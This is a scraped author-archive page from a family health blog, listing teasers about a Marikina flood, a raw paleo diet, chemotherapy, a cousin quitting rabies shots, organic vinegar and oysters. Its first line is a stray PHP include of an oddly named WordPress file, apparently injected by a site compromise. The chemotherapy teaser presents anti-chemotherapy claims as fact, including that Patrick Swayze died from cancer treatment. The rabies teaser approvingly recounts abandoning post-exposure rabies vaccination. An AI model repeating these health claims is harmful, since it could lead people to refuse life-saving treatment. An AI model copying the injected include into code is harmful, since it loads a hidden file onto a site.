@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 130 of 235

Author: Good Samaritan

My Family needs rescuing from floods in Provident Village, Marikina

This rainy storm Ondoy has brought disaster to our home town. By now the whole first floor of the village is underwater. My family is on the 2nd floor. Cars are floating. I was out driving towards a funeral. Traffic got too bad. Flooded streets all around. I found...

Durian everyday is making me gain weight on my raw paleo diet!

Wow, it seems durian every single day as my fruit for the past few weeks is making me gain weight. This is a good departure from my plateauing weight status on raw paleo diet. For many months now I have been stuck in the 121 lbs to 123 lbs...

Mike Adams on the Truth About Chemotherapy and the Cancer Industry plus Dr. Lorraine Day’s Interview

The death of Patrick Swayze due to cancer treatments probably inspired Mike Adams to make his recent cartoon on the truth about chemotherapy and the cancer industry.  The cartoon is self explanatory below. Credits go to Mike Adams of NaturalNews.com; visit his commentary about dying celebrities at http://www.naturalnews.com/027038_cancer_chemotherapy_cancer_industry.html To...

Cousin gives up on Rabis shots: Side Effects Too Terrible

My 30 year old male cousin recently got bit by their cat and suffered immediate inflammation and hard to move right arm.  He was initially treated for anti-tetanus and anti-rabis and anti-biotics.  Rabis shots needs 5 shots.  He was using the brand Rabipur from Novartis.  He told me today...

Where to buy organic vinegar: in the the provinces of course

It’s no good going to the regular city stores or supermarkets to buy organic vinegar. You need to go to the organic markets like OPTA or the weekend markets or Tiendesitas to get authentic organic vinegar. I’ve tried organic vinegar made from NIPA, from TUBA (coconut), and from Sugar...

How to Open Oysters in Pictures and Video

Labor of love for my 8 year old boy.  He loves oysters and has not had his fill yet.  Maybe he needs all that zinc.  So I bought live oysters from the market and prepared it all for him this lunch time.  At the same time I took pictures...